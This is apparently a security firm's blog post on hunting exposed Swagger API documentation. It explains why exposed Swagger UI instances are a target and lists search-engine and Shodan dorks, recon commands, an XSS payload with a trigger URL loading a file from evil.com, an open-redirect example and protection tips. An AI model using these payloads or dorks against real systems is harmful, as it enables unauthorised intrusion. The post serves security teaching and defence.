SWAGGER HUNTING: Finding gold in API documentation 

How misconfigured Swagger endpoints become a hacker’s playground 

What Makes Swagger a Target? 

Swagger (OpenAPI) automates API documentation, but exposed instances often reveal: 

  • All API endpoints and parameters 
  • Internal API structures 
  • Authentication mechanisms 
  • Testing interfaces 

The Danger: Developers frequently deploy Swagger UI without authentication, thinking “it’s just documentation.” 

Top Swagger Vulnerabilities 

1. Publicly Exposed Documentation 

# No authentication required 
https://api.company.com/swagger-ui.html 

Impact: Attackers get a complete API blueprint for free. 

2. DOM XSS (Versions 3.14.1-3.38.0) 

# Malicious YAML payload 
 description: <math><mtext><textarea><img src=x onerror=alert(1)> 

Trigger: https://target.com/swagger-ui.html?configUrl=https://evil.com/payload.yaml 

3. Information Leakage 

  • Internal endpoints 
  • API keys in examples 
  • Server details 
  • Authentication flows 

4. Open Redirects 

https://target.com/swagger-ui.html?configUrl=https://phishing.com 

Essential Swagger Dorks 

Google Dorks 

intext:”Swagger UI” site:target.com 
inurl:”swagger-ui.html” -github 
filetype:json swagger site:target.com 
intitle:”Swagger UI” inurl:api-docs 

Shodan Queries 

http.title:”Swagger UI” 
http.favicon.hash:”-1128940573″ 
http.component:”Swagger” +200 

GitHub Recon 

“swagger-ui-dist” path:package.json 
“openapi”: “3.0” path:*.yaml 

Quick Discovery Methods 

Automated Scanning 

# Find subdomains with Swagger 
subfinder -d target.com | httpx -silent | grep -i swagger 
 
# Check common paths 
echo “target.com” | httpx -path /swagger-ui,/api-docs,/v2/api-docs 
 
# Nuclei scanning 
nuclei -t swagger-detection.yaml -l targets.txt 

Common Swagger Paths 

  • /swagger-ui.html 
  • /api-docs
  • /swagger 
  • /v2/api-docs 
  • /swagger.json 
  • /swagger-ui 

Real-World Attack Flow 

  1. Discovery: Find Swagger UI using dorks 
  1. Recon: Study all endpoints and auth methods 
  1. Test: Check for XSS via configUrl parameter 
  1. Exploit: Use leaked info to find deeper vulnerabilities 

Simple Protection Guide 

For Developers: 

  •  Don’t expose Swagger UI in production 
  •  Add authentication if needed 
  •  Keep Swagger updated 
  •  Disable configUrl parameter 
  •  Use network restrictions 

Quick Security Check: 

# Check if your Swagger is exposed 
curl -s https://yourapi.com/swagger-ui.html | grep -q “Swagger UI” && echo “EXPOSED” 

Why It Matters 

For Hackers: Swagger endpoints are low-hanging fruit that often lead to: 

  • API key disclosure 
  • Internal system access 
  • XSS vulnerabilities 
  • Business logic flaws 

For Companies: One exposed Swagger UI can compromise your entire API security. 

Takeaway 

Swagger documentation is like leaving your architectural blueprints in the parking lot. It helps developers but becomes dangerous when exposed. 

Next time you’re hunting, remember to check for Swagger first – it’s often the easiest way into an API. 

Tools to Try: Nuclei, Subfinder, Httpx, Google Dorks 
Always Hunt Ethically!   

case studies

See More Case Studies
Blog

Wireshark Essentials

A vulnerability-detection tool for penetration testing — we’ll focus on Wireshark and how it can reveal login data sent over unencrypted HTTP and FTP. This

Learn more
Contact us

Connect With C9Lab - Your Cybersecurity Partner

Ready to build a stronger defense against cyber threats? We’re here to help!
Contact us today.

Call us at: +91 6262016363
Email: ping@c9lab.com

Let’s build a stronger, more secure digital future together.

Your benefits:
  • Client-oriented
  • Independent
  • Competent
  • Results-driven
  • Problem-solving
  • Transparent
What happens next?
1

We Schedule a call at your convenience 

2

We discuss your requirements

3

We prepare a proposal 

Let's build a stronger, more secure digital future together.